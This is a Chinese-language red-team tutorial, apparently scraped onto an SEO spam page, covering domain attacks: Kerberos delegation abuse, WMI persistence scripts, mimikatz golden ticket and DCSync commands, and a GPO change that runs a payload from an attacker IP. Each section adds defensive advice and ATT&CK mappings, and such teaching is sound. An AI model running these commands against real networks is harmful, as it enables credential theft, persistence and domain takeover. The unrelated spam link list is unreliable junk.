当前位置: 首页 > wzjs >正文

做预定网站的作用百度一下你就知道官网首页

做预定网站的作用,百度一下你就知道官网首页,做网站要切图吗,怎样查网站备案技术要点 漏洞关联与武器化 利用Nessus或Nuclei扫描结果,提取未修复漏洞(如MS17-010、CVE-2020-1472)生成攻击链; 通过Metasploit模块自动化匹配漏洞与内网资产: msf6> db_import nmap_scan.xml msf6> vulns …
技术要点
  1. 漏洞关联与武器化
  • 利用NessusNuclei扫描结果,提取未修复漏洞(如MS17-010、CVE-2020-1472)生成攻击链;

  • 通过Metasploit模块自动化匹配漏洞与内网资产:


msf6> db_import nmap_scan.xml msf6> vulns search cve:2020-1472 
  1. 敏感数据聚合分析
  • 使用PowerSploit提取邮箱、共享文件中的关键词(如"password"、“token”);

  • 结合Elasticsearch搭建日志分析平台,定位管理员活动轨迹(RDP登录、文件修改)。

实战场景
  • 场景:基于Kerberos委派的权限升级
  1. 发现域内配置约束委派的服务账户:

Get-ADComputer -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo 
  1. 伪造S4U请求获取高权限票据,接管目标服务(如SQL Server)。
防御建议
  • 禁用非必要的Kerberos委派配置,定期审查msDS-AllowedToDelegateTo属性;

  • 部署UEBA(用户实体行为分析)监控异常数据访问模式;

  • 对漏洞扫描工具生成的报告进行敏感字段脱敏。


A-05-01 | 持久化后门与隐蔽通道技术

技术要点
  1. 无文件后门技术
  • 计划任务注入:利用WMI事件订阅实现重启后门(工具:WMIEvent);

  • 注册表映像劫持:修改Debugger键值劫持合法进程(如劫持notepad.exe加载恶意DLL)。

  1. 隐蔽通信设计
  • 基于HTTPS的C2心跳:使用Let’s Encrypt证书加密通信(工具:Cobalt Strike);

  • 合法协议滥用:通过ICMP/TCP协议伪装为CDN流量(如Cloudflare反向代理)。

实战场景
  • 场景:WMI事件订阅持久化
  1. 创建永久事件过滤器与消费者:

$filterArgs = @{ Name = '恶意事件过滤器'; EventNamespace = 'root\cimv2'; Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" } $consumerArgs = @{ Name = '恶意消费者'; CommandLineTemplate = "C:\Windows\System32\calc.exe" } Set-WmiInstance -Class __EventFilter -Arguments $filterArgs Set-WmiInstance -Class CommandLineEventConsumer -Arguments $consumerArgs 
  1. 关联过滤器与消费者,实现系统级驻留。
防御建议
  • 监控WMI永久事件订阅(工具:Sysinternals Autoruns);

  • 限制注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options写入权限;

  • 部署网络流量基线分析,识别异常心跳周期。


A-06-01 | 域环境攻击链(黄金票据/DC Sync/组策略利用)

技术要点
  1. 黄金票据伪造
  • 利用域控KRBTGT账户的NTLM哈希生成万能票据:

mimikatz "kerberos::golden /domain:test.com /sid:S-1-5-21-123456789 /krbtgt:xxxx /user:administrator /ptt" 
  • 绕过Kerberos PAC验证(需禁用KDC签名验证)。
  1. DC Sync攻击
  • 通过DRSUAPI协议模拟域控同步ntds.dit数据:

mimikatz "lsadump::dcsync /domain:test.com /user:Administrator" 
  1. 组策略对象(GPO)滥用
  • 篡改GPO部署恶意启动脚本或注册表项(工具:SharpGPOAbuse)。
实战场景
  • 场景:GPO推送后门至全域主机
  1. 定位具备WriteProperty权限的GPO:

Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty" } 
  1. 修改GPO的User\Scripts\Logon脚本路径指向恶意PS1文件:

Set-GPRegistryValue -Name "Default Domain Policy" -Key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Update" -Value "\\攻击者IP\恶意脚本.exe" 
防御建议
  • 定期重置KRBTGT账户密码(每30天);

  • 启用“特权账户保护”策略,限制DCSync权限;

  • 监控GPO修改事件(Event ID 5136、5141)及SYSVOL目录变更。


扩展与深化方向

  1. 红蓝对抗升级
  • 针对EDR的绕过技术:进程空洞注入(Process Hollowing)、直接系统调用(Syscall);

  • 防御方可通过内存签名扫描(如YARA规则)检测无文件攻击。

  1. 自动化攻击框架
  • 整合分类体系中的技术点至Cobalt StrikeSliver框架,生成模块化攻击链。
  1. ATT&CK映射

| 技术点 | MITRE ID | 检测建议 |

|-------------------|----------------|--------------------------|

| 黄金票据 | T1558.001 | 监控异常Kerberos TGT请求 |

| DC Sync | T1003.003 | 审核域控DRSUAPI调用来源 |

| GPO后门 | T1484.001 | 对比GPO版本哈希值 |

此部分内容覆盖内网渗透终局阶段的核心技术,建议结合实战靶场(如Vulnstack、AttackRange)进行复现,强化攻防思维闭环。

http://www.dtcms.com/wzjs/165747.html

相关文章:

  • 网站备案帐号是什么必应搜索引擎网站
  • 郑州哪有做网站的软文网站发布平台
  • 怎么做优惠网站百度手游排行榜
  • 政务网站集约化建设推进情况seo分析工具
  • 江西省建设厅网站首页微信软文案例
  • 桐城市美好乡村建设办公室网站搜索引擎广告推广
  • 学做网站丛什么开始友情链接的英文
  • 做一个卖东西的网站自己可以做网站推广吗
  • 商会网站建设开发竞价排名名词解释
  • 百度灰色关键词排名哈尔滨怎样关键词优化
  • 山东网站建设公司亿驱动力竞价托管
  • 网站设计应该怎么做拼多多关键词排名在哪里看
  • 做电商网站的感想如何加入广告联盟赚钱
  • 福建省建设注册中心网站东莞今日头条最新消息
  • 家里公网宽带做网站要备案么商丘seo
  • 做网站需要找什么客户seo在线培训课程
  • 网站建设面谈销售话术百度关键词排名点击器
  • 在个人网站上做电商营业执照域名交易域名出售
  • 安卓上架app要多少钱seo学徒
  • 网建设门户网站百度精准营销获客平台
  • 自己建网站怎么做影视资源免费创建个人博客网站
  • 做网站推广有用吗百度旗下所有app列表
  • 去哪找做网站的人网站优化seo培
  • 做网站安全联盟解seo有些什么关键词
  • 网站关键词排名分析今天重大新闻
  • 美女做爰免费观看视频网站seo sem是指什么意思
  • 企业做网站要注意些什么问题百度竞价效果怎么样
  • 中国建设银行巴黎分行网站手机端网站优化
  • 怎么把自己的网站放到百度上企业网站怎么建立
  • wordpress碎语插件优化大师官网入口